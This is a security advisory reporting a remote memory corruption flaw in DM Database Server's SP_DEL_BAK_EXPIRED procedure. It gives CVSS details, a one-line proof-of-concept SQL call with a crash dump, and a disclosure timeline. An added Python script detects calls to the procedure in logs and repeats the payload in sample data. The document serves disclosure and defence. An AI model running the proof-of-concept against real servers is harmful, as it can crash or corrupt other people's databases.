DM Database Server Memory Corruption Vulnerability

2010.06.12
Credit: wsn1983
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Vulnerable: All versions
Vendor: www.dameng.com
Discovered by: Shennan Wang (HuaweiSymantec SRT)

Details:
=========
A vulnerability in all versions of DM Database Server allows an attacker to execute arbitrary code or cause a DoS (Denial of Service). Authentication is required to exploit this vulnerability. The specific flaw exists within the SP_DEL_BAK_EXPIRED procedure.

POC:
=========
CALL SP_DEL_BAK_EXPIRED('AAAAAAAAAAAAAAAAAAAA', '');

(458.5fc): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=02d3d430 ecx=ffffffff edx=074ecfd0 esi=074ed37c edi=0000041c
eip=100d1753 esp=074eccec ebp=074ed1fc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** WARNING: Unable to verify checksum for C:\dmdbms\bin\wdm_dll.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\dmdbms\bin\wdm_dll.dll -
wdm_dll+0xd1753:
100d1753 f2ae repne scas byte ptr es:[edi]
0:009> da ebp
074ed1fc "AAAAAAAAAAAAAAAAAAAA"

Timeline:
========
2010.04.17 Reported to vendor, no response.
2010.05.31 Public

References:

http://xforce.iss.net/xforce/xfdb/59081
http://www.securityfocus.com/bid/40460
http://www.securityfocus.com/archive/1/archive/1/511559/100/0/threaded
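
Because the timeline records no vendor response, monitoring for calls to the affected procedure is one practical control. The following is an added example, not part of the original advisory or any vendor code: it scans a statement log for real invocations of SP_DEL_BAK_EXPIRED while ignoring the name when it only appears inside comments or string literals. The log layout, the SYSDBA allowlist and the sample lines are assumptions constructed for illustration.

```python
import re

PROC = "SP_DEL_BAK_EXPIRED"   # procedure named in the advisory
BACKUP_ADMINS = {"SYSDBA"}    # assumption: accounts expected to run backup maintenance

# One token per match: line comment, block comment, string literal ('' escapes a quote), or any char.
_TOKEN = re.compile(r"--[^\n]*|/\*.*?\*/|'(?:[^']|'')*'|.", re.S)
_CALL = re.compile(r'(?<![\w$])"?%s"?\s*\(\s*(?:\x00(\d+)\x00)?' % PROC, re.I)
_LINE = re.compile(r"^(\S+) user=(\S+) sql=(.*)$", re.S)  # constructed log layout

def find_calls(sql):
    """One entry per real call to PROC: length of the first argument when it is a
    string literal, else None. Matches inside comments or literals are ignored."""
    literals, skeleton = [], []
    for m in _TOKEN.finditer(sql.replace("\x00", "")):
        tok = m.group(0)
        if tok.startswith(("--", "/*")):
            skeleton.append(" ")                      # comments cannot hide or fake a call
        elif tok.startswith("'") and len(tok) >= 2:
            literals.append(tok[1:-1].replace("''", "'"))
            skeleton.append("\x00%d\x00" % (len(literals) - 1))  # placeholder for the literal
        else:
            skeleton.append(tok)
    hits = []
    for m in _CALL.finditer("".join(skeleton)):
        hits.append(len(literals[int(m.group(1))]) if m.group(1) else None)
    return hits

def scan(lines):
    """Return (timestamp, user, first_arg_len) for each call by a non-allowlisted account."""
    alerts = []
    for line in lines:
        m = _LINE.match(line)
        if m and m.group(2).upper() not in BACKUP_ADMINS:
            alerts += [(m.group(1), m.group(2), n) for n in find_calls(m.group(3))]
    return alerts

# Constructed sample statement log (not DM's real audit format).
SAMPLE_LOG = [
    "2010-06-01T02:00:00 user=SYSDBA sql=CALL SP_DEL_BAK_EXPIRED('ARG1', 'ARG2');",
    "2010-06-01T09:14:07 user=APP1 sql=call /*x*/ sp_del_bak_expired ('AAAAAAAAAAAAAAAAAAAA', '');",
    "2010-06-01T09:15:30 user=APP1 sql=SELECT 'SP_DEL_BAK_EXPIRED(''a'','''')' FROM T1;",
    "2010-06-01T09:16:02 user=APP2 sql=CALL SYSDBA.SP_DEL_BAK_EXPIRED(:p1, :p2);",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The reported argument length is informational only; the advisory's crash occurs with a 20-character argument, so any call from an unexpected account is worth reviewing.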

